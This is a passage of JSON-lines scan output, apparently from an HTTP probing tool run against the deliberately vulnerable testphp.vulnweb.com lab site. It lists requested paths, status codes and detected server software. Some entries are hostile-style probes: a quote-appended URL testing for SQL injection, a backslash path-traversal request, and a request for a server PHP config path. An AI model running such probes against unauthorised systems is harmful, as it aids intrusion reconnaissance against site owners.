estphp.vulnweb.com:80/showimage.php?file=./pictures/2.jpg\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"image/jpeg\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/showimage.php?file=./pictures/2.jpg\",\"time\":\"351.771418ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":24,\"lines\":17,\"status_code\":200,\"content_length\":3324,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:54.301956316Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/showimage.php?file=./pictures/6.jpg\",\"input\":\"http://testphp.vulnweb.com:80/showimage.php?file=./pictures/6.jpg\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"image/jpeg\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/showimage.php?file=./pictures/6.jpg\",\"time\":\"353.134914ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":48,\"lines\":56,\"status_code\":200,\"content_length\":11465,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:54.308885017Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/showimage.php?file=./pictures/4.jpg\",\"input\":\"http://testphp.vulnweb.com:80/showimage.php?file=./pictures/4.jpg\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"image/jpeg\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/showimage.php?file=./pictures/4.jpg\",\"time\":\"340.585894ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":65,\"lines\":72,\"status_code\":200,\"content_length\":13969,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:54.310462379Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/showimage.php?file=./pictures/1.jpg\",\"input\":\"http://testphp.vulnweb.com:80/showimage.php?file=./pictures/1.jpg\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"image/jpeg\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/showimage.php?file=./pictures/1.jpg\",\"time\":\"355.953836ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":53,\"lines\":61,\"status_code\":200,\"content_length\":12426,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:54.331945919Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/showimage.php?file=./pictures/5.jpg\",\"input\":\"http://testphp.vulnweb.com:80/showimage.php?file=./pictures/5.jpg\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"image/jpeg\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/showimage.php?file=./pictures/5.jpg\",\"time\":\"363.511795ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":76,\"lines\":76,\"status_code\":200,\"content_length\":14228,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:54.491090722Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/showimage.php?file=./pictures/7.jpg\",\"input\":\"http://testphp.vulnweb.com:80/showimage.php?file=./pictures/7.jpg\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"image/jpeg\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/showimage.php?file=./pictures/7.jpg\",\"time\":\"537.454515ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":100,\"lines\":81,\"status_code\":200,\"content_length\":19219,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:56.348828239Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/sitemap,xml\",\"input\":\"http://testphp.vulnweb.com:80/sitemap,xml\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/sitemap,xml\",\"time\":\"339.995133ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:56.351767809Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/userinfo.php'\",\"input\":\"http://testphp.vulnweb.com:80/userinfo.php'\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/userinfo.php'\",\"time\":\"339.433748ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:56.352336256Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/userinfo.php '\",\"input\":\"http://testphp.vulnweb.com:80/userinfo.php%20'\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/userinfo.php%20%27\",\"time\":\"343.601378ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:56.352364361Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/usr/local/etc/php/extensions.ini\",\"input\":\"http://testphp.vulnweb.com:80/usr/local/etc/php/extensions.ini\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/usr/local/etc/php/extensions.ini\",\"time\":\"342.808638ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:56.352849739Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/usr/local/etc/php\",\"input\":\"http://testphp.vulnweb.com:80/usr/local/etc/php\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/usr/local/etc/php\",\"time\":\"341.518746ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:56.363416056Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/tapan.php\",\"input\":\"http://testphp.vulnweb.com:80/tapan.php\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/tapan.php\",\"time\":\"350.683725ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":3,\"lines\":2,\"status_code\":404,\"content_length\":16,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:56.363498367Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/upload\",\"input\":\"http://testphp.vulnweb.com:80/upload\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/upload\",\"time\":\"344.08478ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:56.368287609Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/urinfo.php\",\"input\":\"http://testphp.vulnweb.com:80/urinfo.php\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/urinfo.php\",\"time\":\"356.215873ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":3,\"lines\":2,\"status_code\":404,\"content_length\":16,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:56.36837967Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/uploads\",\"input\":\"http://testphp.vulnweb.com:80/uploads\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/uploads\",\"time\":\"348.94886ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:56.369700624Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/userinfo.'\",\"input\":\"http://testphp.vulnweb.com:80/userinfo.'\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/userinfo.'\",\"time\":\"347.500386ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:56.369844459Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/sitemap.xml\",\"input\":\"http://testphp.vulnweb.com:80/sitemap.xml\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/sitemap.xml\",\"time\":\"354.933577ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:56.369955692Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/userinfo.php\\u0026fcbz=1\",\"input\":\"http://testphp.vulnweb.com:80/userinfo.php\\u0026fcbz=1\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/userinfo.php\\u0026fcbz=1\",\"time\":\"348.197616ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:56.371007486Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/userinfo.php\",\"input\":\"http://testphp.vulnweb.com:80/userinfo.php\",\"location\":\"login.php\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/userinfo.php\",\"time\":\"352.865235ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":3,\"lines\":1,\"status_code\":302,\"content_length\":14,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:56.371416621Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/u\",\"input\":\"http://testphp.vulnweb.com:80/u\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/u\",\"time\":\"350.938128ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:56.372050111Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/test\",\"input\":\"http://testphp.vulnweb.com:80/test\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/test\",\"time\":\"355.237372ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:56.374226165Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/t/aaa.txt\",\"input\":\"http://testphp.vulnweb.com:80/t/aaa.txt\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/t/aaa.txt\",\"time\":\"352.15792ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:56.379205356Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/user.php\",\"input\":\"http://testphp.vulnweb.com:80/user.php\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/user.php\",\"time\":\"352.155913ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":3,\"lines\":2,\"status_code\":404,\"content_length\":16,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:56.37528961Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/style.css\",\"input\":\"http://testphp.vulnweb.com:80/style.css\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/css\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/style.css\",\"time\":\"352.79359ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":510,\"lines\":324,\"status_code\":200,\"content_length\":5482,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:56.378924174Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/signup.php\",\"input\":\"http://testphp.vulnweb.com:80/signup.php\",\"title\":\"signup\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/signup.php\",\"time\":\"351.95482ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":547,\"lines\":122,\"status_code\":200,\"content_length\":6033,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:56.383954731Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/ssdgsg\",\"input\":\"http://testphp.vulnweb.com:80/ssdgsg\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/ssdgsg\",\"time\":\"355.324241ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:58.708018624Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/wvstests/pmwiki_2_1_19\",\"input\":\"http://testphp.vulnweb.com:80/wvstests/pmwiki_2_1_19\",\"location\":\"http://testphp.vulnweb.com/wvstests/pmwiki_2_1_19/\",\"title\":\"301 Moved Permanently\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/wvstests/pmwiki_2_1_19\",\"time\":\"350.912297ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":301,\"content_length\":169,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:58.714193882Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/wvstests/\",\"input\":\"http://testphp.vulnweb.com:80/wvstests/\",\"title\":\"Index of /wvstests/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/wvstests/\",\"time\":\"356.329936ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":64,\"lines\":8,\"status_code\":200,\"content_length\":272,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:58.720859062Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/wp-admin\",\"input\":\"http://testphp.vulnweb.com:80/wp-admin\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/wp-admin\",\"time\":\"348.06904ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:58.722362831Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/youtube\",\"input\":\"http://testphp.vulnweb.com:80/youtube\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/youtube\",\"time\":\"351.096227ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:58.7243755Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/wvstests/pmwiki_2_1_19/scripts/\",\"input\":\"http://testphp.vulnweb.com:80/wvstests/pmwiki_2_1_19/scripts/\",\"title\":\"Index of /wvstests/pmwiki_2_1_19/scripts/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/wvstests/pmwiki_2_1_19/scripts/\",\"time\":\"346.484533ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":66,\"lines\":8,\"status_code\":200,\"content_length\":313,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:58.72614532Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/wvstests/pmwiki_2_1_19/scripts/version.php\",\"input\":\"http://testphp.vulnweb.com:80/wvstests/pmwiki_2_1_19/scripts/version.php\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/wvstests/pmwiki_2_1_19/scripts/version.php\",\"time\":\"355.025396ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":32,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:58.726750741Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/yonetici.php\",\"input\":\"http://testphp.vulnweb.com:80/yonetici.php\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/yonetici.php\",\"time\":\"347.517356ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":3,\"lines\":2,\"status_code\":404,\"content_length\":16,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:58.730597975Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/wvstests/pmwiki_2_1_19/scripts\",\"input\":\"http://testphp.vulnweb.com:80/wvstests/pmwiki_2_1_19/scripts\",\"location\":\"http://testphp.vulnweb.com/wvstests/pmwiki_2_1_19/scripts/\",\"title\":\"301 Moved Permanently\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/wvstests/pmwiki_2_1_19/scripts\",\"time\":\"343.017387ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":301,\"content_length\":169,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:58.732947595Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/xss.html\",\"input\":\"http://testphp.vulnweb.com:80/xss.html?\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/xss.html\",\"time\":\"352.566859ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:58.735252352Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/wvs/\",\"input\":\"http://testphp.vulnweb.com:80/wvs/\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/wvs/\",\"time\":\"352.539579ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:58.736478988Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/wvstests/pmwiki_2_1_19/\",\"input\":\"http://testphp.vulnweb.com:80/wvstests/pmwiki_2_1_19/\",\"title\":\"Index of /wvstests/pmwiki_2_1_19/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/wvstests/pmwiki_2_1_19/\",\"time\":\"355.413756ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":70,\"lines\":8,\"status_code\":200,\"content_length\":294,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:58.73742913Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/xxx\\\\..\\\\..\\\\ACUENDFILE\",\"input\":\"http://testphp.vulnweb.com:80/xxx%5C..%5C..%5CACUENDFILE\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/xxx%5C..%5C..%5CACUENDFILE\",\"time\":\"351.888502ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:32:58.742108605Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com:80/vulnweb/index.php\",\"input\":\"http://testphp.vulnweb.com:80/vulnweb/index.php\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/vulnweb/index.php\",\"time\":\"356.574686ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":3,\"lines\":2,\"status_code\":404,\"content_length\":16,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:10.280238709Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/account.php?id=1\",\"input\":\"http://vulnweb.com/account.php?id=1\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/account.php?id=1\",\"time\":\"343.660487ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:10.280387057Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/FUZZ\",\"input\":\"http://vulnweb.com/FUZZ\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/FUZZ\",\"time\":\"340.959473ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:10.281126807Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/artists.php?artist=1\",\"input\":\"http://vulnweb.com/artists.php?artist=1\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=1\",\"time\":\"342.229334ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:33:10.288372547Z\",\"port\":\"80\",\"url\":\"http://vulnweb.com/101433\",\"input\":\"http://vulnweb.com/101433\",\"title\":\"404 Not 